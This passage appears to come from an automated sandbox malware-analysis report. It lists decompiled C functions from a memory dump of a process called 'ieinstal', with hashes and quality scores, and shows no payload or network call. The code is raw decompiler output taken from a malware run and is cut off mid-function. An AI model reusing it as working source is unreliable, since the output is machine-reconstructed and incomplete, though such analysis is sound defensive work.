                        					return E1ED5D0D1(L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                        				}
                        			}
















                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce78e8e9cd4759d63454d054fad7311251e9b3c07eb14934b923742d98bdb34
                        • Instruction ID: e01486b2d8d8cc4ef03b83c1241ddfb3f66a630c7557050502ff2a3a9dbde440
                        • Opcode Fuzzy Hash: cce78e8e9cd4759d63454d054fad7311251e9b3c07eb14934b923742d98bdb34
                        • Instruction Fuzzy Hash: 09213C35051681DFC721DF28CA50F5AB7B9FF18708F594A68E04A876E1C734E942CB65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E1ED3B390(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed char _t12;
                        				signed int _t16;
                        				signed int _t21;
                        				void* _t28;
                        				signed int _t30;
                        				signed int _t36;
                        				signed int _t41;
                        
                        				_push(__ecx);
                        				_t41 = _a4 + 0xffffffb8;
                        				E1ED22280(_t12, 0x1edf8608);
                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                        				asm("sbb edi, edi");
                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                        				_v8 = _t36;
                        				asm("lock cmpxchg [ebx], ecx");
                        				_t30 = 1;
                        				if(1 != 1) {
                        					while(1) {
                        						_t21 = _t30 & 0x00000006;
                        						_t16 = _t30;
                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                        						asm("lock cmpxchg [edi], esi");
                        						if(_t16 == _t30) {
                        							break;
                        						}
                        						_t30 = _t16;
                        					}
                        					_t36 = _v8;
                        					if(_t21 == 2) {
                        						_t16 = E1ED400C2(0x1edf8608, 0, _t28);
                        					}
                        				}
                        				if(_t36 != 0) {
                        					_t16 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                        				}
                        				return _t16;
                        			}












                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 880c79ac26016b020c8cd991d5e3c7e7a9f7df0d0324c5f0f2bcfc76cbca96d9
                        • Instruction ID: 08042ea3ffb31436ce9244c917b7efc2aed1328c7c6adbe614dd37d6ef89e67c
                        • Opcode Fuzzy Hash: 880c79ac26016b020c8cd991d5e3c7e7a9f7df0d0324c5f0f2bcfc76cbca96d9
                        • Instruction Fuzzy Hash: 6B1148777151609BC719CA569D81A5BB257EBC5730B79033DED1687380CA32EC02C792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E1ED94257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t18;
                        				intOrPtr _t24;
                        				intOrPtr* _t27;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				intOrPtr _t33;
                        				intOrPtr* _t34;
                        				intOrPtr* _t35;
                        				void* _t37;
                        				void* _t38;
                        				void* _t39;
                        				void* _t43;
                        
                        				_t39 = __eflags;
                        				_t35 = __edi;
                        				_push(8);
                        				_push(0x1ede08d0);
                        				E1ED5D08C(__ebx, __edi, __esi);
                        				_t37 = __ecx;
                        				E1ED941E8(__ebx, __edi, __ecx, _t39);
                        				E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                        				_t18 = _t37 + 8;
                        				_t33 =  *_t18;
                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                        					L8:
                        					_push(3);
                        					asm("int 0x29");
                        				} else {
                        					 *_t27 = _t33;
                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                        					_t35 = 0x1edf87e4;
                        					_t18 =  *0x1edf87e0; // 0x0
                        					while(_t18 != 0) {
                        						_t43 = _t18 -  *0x1edf5cd0; // 0xffffffff
                        						if(_t43 >= 0) {
                        							_t31 =  *0x1edf87e4; // 0x0
                        							_t18 =  *_t31;
                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                        								goto L8;
                        							} else {
                        								 *0x1edf87e4 = _t18;
                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                        								L1ED07055(_t31 + 0xfffffff8);
                        								_t24 =  *0x1edf87e0; // 0x0
                        								_t18 = _t24 - 1;
                        								 *0x1edf87e0 = _t18;
                        								continue;
                        							}
                        						}
                        						goto L9;
                        					}
                        				}
                        				L9:
                        				__eflags =  *0x1edf5cd0;
                        				if( *0x1edf5cd0 <= 0) {
                        					L1ED07055(_t37);
                        				} else {
                        					_t30 = _t37 + 8;
                        					_t34 =  *0x1edf87e8; // 0x0
                        					__eflags =  *_t34 - _t35;
                        					if( *_t34 != _t35) {
                        						goto L8;
                        					} else {
                        						 *_t30 = _t35;
                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                        						 *_t34 = _t30;
                        						 *0x1edf87e8 = _t30;
                        						 *0x1edf87e0 = _t18 + 1;
                        					}
                        				}
                        				 *(_t38 - 4) = 0xfffffffe;
                        				return E1ED5D0D1(L1ED94320());
                        			}
















                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7aba5c3f59dd3e8d2a0cd4ec98b38a3517baf691e53ffa1be5d6f555d930f957
                        • Instruction ID: ddf213084ea8aeb3499fd57f689511d57e9506ef786cc919f36ff10dd5187cb6
                        • Opcode Fuzzy Hash: 7aba5c3f59dd3e8d2a0cd4ec98b38a3517baf691e53ffa1be5d6f555d930f957
                        • Instruction Fuzzy Hash: E2216D78901762CFC704DF65C9A1608BBF1FF45314B51876AC1168B296D731E443DB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E1ED846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                        				signed short* _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				signed int _t22;
                        				signed char _t23;
                        				short _t32;
                        				void* _t38;
                        				char* _t40;
                        
                        				_v12 = __edx;
                        				_t29 = 0;
                        				_v8 = __ecx;
                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                        				_t38 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                        				if(_t38 != 0) {
                        					_t40 = _a4;
                        					 *_t40 = 1;
                        					E1ED4F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                        					_t22 = _v12 >> 1;
                        					_t32 = 0x2e;
                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                        					_t23 = E1ED3D268(_t38, 1);
                        					asm("sbb al, al");
                        					 *_t40 =  ~_t23 + 1;
                        					L1ED277F0(_v16, 0, _t38);
                        				} else {
                        					 *_a4 = 0;
                        					_t29 = 0xc0000017;
                        				}
                        				return _t29;
                        			}












                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 3104a720a51b658946c505bb70cf1f43e3058dfe9f8bdfbda9fcdb02ae64259f
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: E1110276504248BBC7018F5C98808BEB7B9EF95304F1081AEF98487350DB319D51C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E1ED32397(intOrPtr _a4) {
                        				void* __ebx;
                        				void* __ecx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t11;
                        				void* _t19;
                        				void* _t25;
                        				void* _t26;
                        				intOrPtr _t27;
                        				void* _t28;
                        				void* _t29;
                        
                        				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                        				if( *0x1edf848c != 0) {
                        					L1ED2FAD0(0x1edf8610);
                        					if( *0x1edf848c == 0) {
                        						E1ED2FA00(0x1edf8610, _t19, _t27, 0x1edf8610);
                        						goto L1;
                        					} else {
                        						_push(0);
                        						_push(_a4);
                        						_t26 = 4;
                        						_t29 = E1ED32581(0x1edf8610, 0x1ece50a0, _t26, _t27, _t28);
                        						E1ED2FA00(0x1edf8610, 0x1ece50a0, _t27, 0x1edf8610);
                        					}
                        				} else {
                        					L1:
                        					_t11 =  *0x1edf8614; // 0x1
                        					if(_t11 == 0) {
                        						_t11 = E1ED44886(0x1ece1088, 1, 0x1edf8614);
                        					}
                        					_push(0);
                        					_push(_a4);
                        					_t25 = 4;
                        					_t29 = E1ED32581(0x1edf8610, (_t11 << 4) + 0x1ece5070, _t25, _t27, _t28);
                        				}
                        				if(_t29 != 0) {
                        					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                        					 *((char*)(_t29 + 0x40)) = 0;
                        				}
                        				return _t29;
                        			}
















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80d8c2a60257f50386fd35ca72d9f7230d5e036091a3dae030c52c25da071c18
                        • Instruction ID: 23c3a2bc1ad7ea58ae6fc66a6971b4324f5c92c1375f05fb245cc6fb99364eed
                        • Opcode Fuzzy Hash: 80d8c2a60257f50386fd35ca72d9f7230d5e036091a3dae030c52c25da071c18
                        • Instruction Fuzzy Hash: 8D114275F003906BD720C62A9C91B19F6C9AF50F12F644B2EF542A76C0D770F882C765
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E1ED437F5(void* __ecx, intOrPtr* __edx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t6;
                        				intOrPtr _t13;
                        				intOrPtr* _t20;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t27 = __edx;
                        				_t28 = __ecx;
                        				if(__edx == 0) {
                        					E1ED22280(_t6, 0x1edf8550);
                        				}
                        				_t29 = E1ED4387E(_t28);
                        				if(_t29 == 0) {
                        					L6:
                        					if(_t27 == 0) {
                        						E1ED1FFB0(0x1edf8550, _t27, 0x1edf8550);
                        					}
                        					if(_t29 == 0) {
                        						return 0xc0000225;
                        					} else {
                        						if(_t27 != 0) {
                        							goto L14;
                        						}
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                        						goto L11;
                        					}
                        				} else {
                        					_t13 =  *_t29;
                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                        						L13:
                        						_push(3);
                        						asm("int 0x29");
                        						L14:
                        						 *_t27 = _t29;
                        						L11:
                        						return 0;
                        					}
                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                        					if( *_t20 != _t29) {
                        						goto L13;
                        					}
                        					 *_t20 = _t13;
                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                        					asm("btr eax, ecx");
                        					goto L6;
                        				}
                        			}












                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f54100e1c12952f10d7fa794289554abd25bd978e3937b8fd7171d0033993922
                        • Instruction ID: 6655081defb0a62c1ac1db32585a0f5faca595bf3e7f87cc819b6f719c506a31
                        • Opcode Fuzzy Hash: f54100e1c12952f10d7fa794289554abd25bd978e3937b8fd7171d0033993922
                        • Instruction Fuzzy Hash: D70149729016919BC3278B1ED940E1EFBA7DFA5B60726466DE4498FB44DF30D801C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 42%
                        			E1ED0C962(char __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t19;
                        				char _t22;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				char _t32;
                        				char _t34;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t38;
                        				signed int _t39;
                        
                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                        				_v8 =  *0x1edfd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                        				_t34 = __ecx;
                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                        					_t26 = 0;
                        					E1ED1EEF0(0x1edf70a0);
                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                        					if(E1ED8F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                        						L9:
                        						E1ED1EB70(_t29, 0x1edf70a0);
                        						_t19 = _t26;
                        						L2:
                        						_pop(_t35);
                        						_pop(_t37);
                        						_pop(_t27);
                        						return E1ED4B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                        					}
                        					_t29 = _t34;
                        					_t26 = E1ED8F1FC(_t34, _t32);
                        					if(_t26 < 0) {
                        						goto L9;
                        					}
                        					_t38 =  *0x1edf70c0; // 0x0
                        					while(_t38 != 0x1edf70c0) {
                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                        						_t38 =  *_t38;
                        						_v12 = _t22;
                        						if(_t22 != 0) {
                        							_t29 = _t22;
                        							 *0x1edfb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                        							_v12();
                        						}
                        					}
                        					goto L9;
                        				}
                        				_t19 = 0;
                        				goto L2;
                        			}



















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1b29db7470df3e87a53a0c033d99a6d6e154c5a333bb6cc6312570f0f2d376d
                        • Instruction ID: b47b816cfafdd00771c6687764a157dba386be8cca10d8dbe1c09b29cc14bced
                        • Opcode Fuzzy Hash: f1b29db7470df3e87a53a0c033d99a6d6e154c5a333bb6cc6312570f0f2d376d
                        • Instruction Fuzzy Hash: 0811C232A106969BC700DF29CD94A5A77F6FF88215B020B29F94287690DB21EC55C7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED3002D() {
                        				void* _t11;
                        				char* _t14;
                        				signed char* _t16;
                        				char* _t27;
                        				signed char* _t29;
                        
                        				_t11 = E1ED27D50();
                        				_t27 = 0x7ffe0384;
                        				if(_t11 != 0) {
                        					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t14 = 0x7ffe0384;
                        				}
                        				_t29 = 0x7ffe0385;
                        				if( *_t14 != 0) {
                        					if(E1ED27D50() == 0) {
                        						_t16 = 0x7ffe0385;
                        					} else {
                        						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t16 & 0x00000040) != 0) {
                        						goto L18;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(E1ED27D50() != 0) {
                        						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					if( *_t27 != 0) {
                        						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						if(E1ED27D50() != 0) {
                        							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        						}
                        						if(( *_t29 & 0x00000020) == 0) {
                        							goto L5;
                        						}
                        						L18:
                        						return 1;
                        					} else {
                        						L5:
                        						return 0;
                        					}
                        				}
                        			}









                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: 075052272c6f3994caf746e681224d3d5d03c9f0c50db7d10c4a8bd2762aa5bf
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: A111ED72A166C2CFD3138B29C955B257BA6EB40B58F2A02B0DD44CB692E328DC41C360
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E1ED1766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				char _v8;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr _t29;
                        				intOrPtr* _t30;
                        				void* _t42;
                        				intOrPtr _t47;
                        
                        				_push(__ecx);
                        				_t36 =  &_v8;
                        				if(E1ED3F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                        					L10:
                        					_t22 = 0;
                        				} else {
                        					_t24 = _v8 + __ecx;
                        					_t42 = _t24;
                        					if(_t24 < __ecx) {
                        						goto L10;
                        					} else {
                        						if(E1ED3F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                        							goto L10;
                        						} else {
                        							_t29 = _v8 + _t42;
                        							if(_t29 < _t42) {
                        								goto L10;
                        							} else {
                        								_t47 = _t29;
                        								_t30 = _a16;
                        								if(_t30 != 0) {
                        									 *_t30 = _t47;
                        								}
                        								if(_t47 == 0) {
                        									goto L10;
                        								} else {
                        									_t22 = L1ED24620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t22;
                        			}











                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 61fc9c567b99eac111368003820e8f9ee86e08421fcfc5e495524b9e4e012b88
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: 2B018472701119ABD750CF5EDC51E9B77ADEF896A0B260764F948CF2A4DA30DD0187B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E1ED9C450(intOrPtr* _a4) {
                        				signed char _t25;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t26 = _a4;
                        				_t25 =  *(_t26 + 0x10);
                        				if((_t25 & 0x00000003) != 1) {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					_push(0);
                        					_push( *_t26);
                        					E1ED49910();
                        					_t25 =  *(_t26 + 0x10);
                        				}
                        				if((_t25 & 0x00000001) != 0) {
                        					_push(4);
                        					_t7 = _t26 + 4; // 0x4
                        					_t27 = _t7;
                        					_push(_t27);
                        					_push(5);
                        					_push(0xfffffffe);
                        					E1ED495B0();
                        					if( *_t27 != 0) {
                        						_push( *_t27);
                        						E1ED495D0();
                        					}
                        				}
                        				_t8 = _t26 + 0x14; // 0x14
                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                        				}
                        				_push( *_t26);
                        				E1ED495D0();
                        				return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                        			}







                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: cd5154b7e1703bbb482c5eb2f9cb3dece777abfd6bf88c5949e7ddebe7fdc9b8
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: F401C076240586BFDB119F25CC80E62B76EFB64790F214A25F104439A0CB21FCA0DAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E1ED09080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                        				intOrPtr* _t51;
                        				intOrPtr _t59;
                        				signed int _t64;
                        				signed int _t67;
                        				signed int* _t71;
                        				signed int _t74;
                        				signed int _t77;
                        				signed int _t82;
                        				intOrPtr* _t84;
                        				void* _t85;
                        				intOrPtr* _t87;
                        				void* _t94;
                        				signed int _t95;
                        				intOrPtr* _t97;
                        				signed int _t99;
                        				signed int _t102;
                        				void* _t104;
                        
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t97 = __ecx;
                        				_t102 =  *(__ecx + 0x14);
                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                        					_t102 = _t102 | 0x000007d0;
                        				}
                        				_t48 =  *[fs:0x30];
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        					_t102 = _t102 & 0xff000000;
                        				}
                        				_t80 = 0x1edf85ec;
                        				E1ED22280(_t48, 0x1edf85ec);
                        				_t51 =  *_t97 + 8;
                        				if( *_t51 != 0) {
                        					L6:
                        					return E1ED1FFB0(_t80, _t97, _t80);
                        				} else {
                        					 *(_t97 + 0x14) = _t102;
                        					_t84 =  *0x1edf538c; // 0x304fff8
                        					if( *_t84 != 0x1edf5388) {
                        						_t85 = 3;
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c);
                        						_push(0x1eddf6e8);
                        						E1ED5D0E8(0x1edf85ec, _t97, _t102);
                        						 *((char*)(_t104 - 0x1d)) = 0;
                        						_t99 =  *(_t104 + 8);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							L13:
                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        							if(__eflags == 0) {
                        								E1EDD88F5(_t80, _t85, 0x1edf5388, _t99, _t102, __eflags);
                        							}
                        						} else {
                        							__eflags = _t99 -  *0x1edf86c0; // 0x2fb07b0
                        							if(__eflags == 0) {
                        								goto L13;
                        							} else {
                        								__eflags = _t99 -  *0x1edf86b8; // 0x300f308
                        								if(__eflags == 0) {
                        									goto L13;
                        								} else {
                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        									__eflags =  *((char*)(_t59 + 0x28));
                        									if( *((char*)(_t59 + 0x28)) == 0) {
                        										E1ED22280(_t99 + 0xe0, _t99 + 0xe0);
                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                        										__eflags =  *((char*)(_t99 + 0xe5));
                        										if(__eflags != 0) {
                        											E1EDD88F5(0x1edf85ec, _t85, 0x1edf5388, _t99, _t102, __eflags);
                        										} else {
                        											__eflags =  *((char*)(_t99 + 0xe4));
                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                        												 *((char*)(_t99 + 0xe4)) = 1;
                        												_push(_t99);
                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                        												E1ED4AFD0();
                        											}
                        											while(1) {
                        												_t71 = _t99 + 8;
                        												 *(_t104 - 0x2c) = _t71;
                        												_t80 =  *_t71;
                        												_t95 = _t71[1];
                        												 *(_t104 - 0x28) = _t80;
                        												 *(_t104 - 0x24) = _t95;
                        												while(1) {
                        													L19:
                        													__eflags = _t95;
                        													if(_t95 == 0) {
                        														break;
                        													}
                        													_t102 = _t80;
                        													 *(_t104 - 0x30) = _t95;
                        													 *(_t104 - 0x24) = _t95 - 1;
                        													asm("lock cmpxchg8b [edi]");
                        													_t80 = _t102;
                        													 *(_t104 - 0x28) = _t80;
                        													 *(_t104 - 0x24) = _t95;
                        													__eflags = _t80 - _t102;
                        													_t99 =  *(_t104 + 8);
                        													if(_t80 != _t102) {
                        														continue;
                        													} else {
                        														__eflags = _t95 -  *(_t104 - 0x30);
                        														if(_t95 !=  *(_t104 - 0x30)) {
                        															continue;
                        														} else {
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																_t74 = 0;
                        																 *(_t104 - 0x34) = 0;
                        																_t102 = 0;
                        																__eflags = 0;
                        																while(1) {
                        																	 *(_t104 - 0x3c) = _t102;
                        																	__eflags = _t102 - 3;
                        																	if(_t102 >= 3) {
                        																		break;
                        																	}
                        																	__eflags = _t74;
                        																	if(_t74 != 0) {
                        																		L49:
                        																		_t102 =  *_t74;
                        																		__eflags = _t102;
                        																		if(_t102 != 0) {
                        																			_t102 =  *(_t102 + 4);
                        																			__eflags = _t102;
                        																			if(_t102 != 0) {
                        																				 *0x1edfb1e0(_t74, _t99);
                        																				 *_t102();
                        																			}
                        																		}
                        																		do {
                        																			_t71 = _t99 + 8;
                        																			 *(_t104 - 0x2c) = _t71;
                        																			_t80 =  *_t71;
                        																			_t95 = _t71[1];
                        																			 *(_t104 - 0x28) = _t80;
                        																			 *(_t104 - 0x24) = _t95;
                        																			goto L19;
                        																		} while (_t74 == 0);
                        																		goto L49;
                        																	} else {
                        																		_t82 = 0;
                        																		__eflags = 0;
                        																		while(1) {
                        																			 *(_t104 - 0x38) = _t82;
                        																			__eflags = _t82 -  *0x1edf84c0;
                        																			if(_t82 >=  *0x1edf84c0) {
                        																				break;
                        																			}
                        																			__eflags = _t74;
                        																			if(_t74 == 0) {
                        																				_t77 = E1EDD9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                        																				__eflags = _t77;
                        																				if(_t77 == 0) {
                        																					_t74 = 0;
                        																					__eflags = 0;
                        																				} else {
                        																					_t74 = _t77 + 0xfffffff4;
                        																				}
                        																				 *(_t104 - 0x34) = _t74;
                        																				_t82 = _t82 + 1;
                        																				continue;
                        																			}
                        																			break;
                        																		}
                        																		_t102 = _t102 + 1;
                        																		continue;
                        																	}
                        																	goto L20;
                        																}
                        																__eflags = _t74;
                        															}
                        														}
                        													}
                        													break;
                        												}
                        												L20:
                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                        												 *((char*)(_t99 + 0xe5)) = 1;
                        												 *((char*)(_t104 - 0x1d)) = 1;
                        												goto L21;
                        											}
                        										}
                        										L21:
                        										 *(_t104 - 4) = 0xfffffffe;
                        										E1ED0922A(_t99);
                        										_t64 = E1ED27D50();
                        										__eflags = _t64;
                        										if(_t64 != 0) {
                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        										} else {
                        											_t67 = 0x7ffe0386;
                        										}
                        										__eflags =  *_t67;
                        										if( *_t67 != 0) {
                        											_t67 = E1EDD8B58(_t99);
                        										}
                        										__eflags =  *((char*)(_t104 - 0x1d));
                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                        											__eflags = _t99 -  *0x1edf86c0; // 0x2fb07b0
                        											if(__eflags != 0) {
                        												__eflags = _t99 -  *0x1edf86b8; // 0x300f308
                        												if(__eflags == 0) {
                        													_t94 = 0x1edf86bc;
                        													_t87 = 0x1edf86b8;
                        													goto L27;
                        												} else {
                        													__eflags = _t67 | 0xffffffff;
                        													asm("lock xadd [edi], eax");
                        													if(__eflags == 0) {
                        														E1ED09240(_t80, _t99, _t99, _t102, __eflags);
                        													}
                        												}
                        											} else {
                        												_t94 = 0x1edf86c4;
                        												_t87 = 0x1edf86c0;
                        												L27:
                        												E1ED39B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                        											}
                        										}
                        									} else {
                        										goto L13;
                        									}
                        								}
